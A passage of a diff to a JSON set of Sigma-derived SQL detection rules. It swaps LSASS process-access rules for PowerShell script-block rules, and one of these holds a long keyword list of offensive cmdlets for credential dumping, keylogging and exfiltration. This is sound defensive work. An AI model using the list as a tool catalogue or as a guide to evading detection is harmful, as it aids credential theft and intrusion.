OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "status": "experimental", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", - "author": "frack113", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE 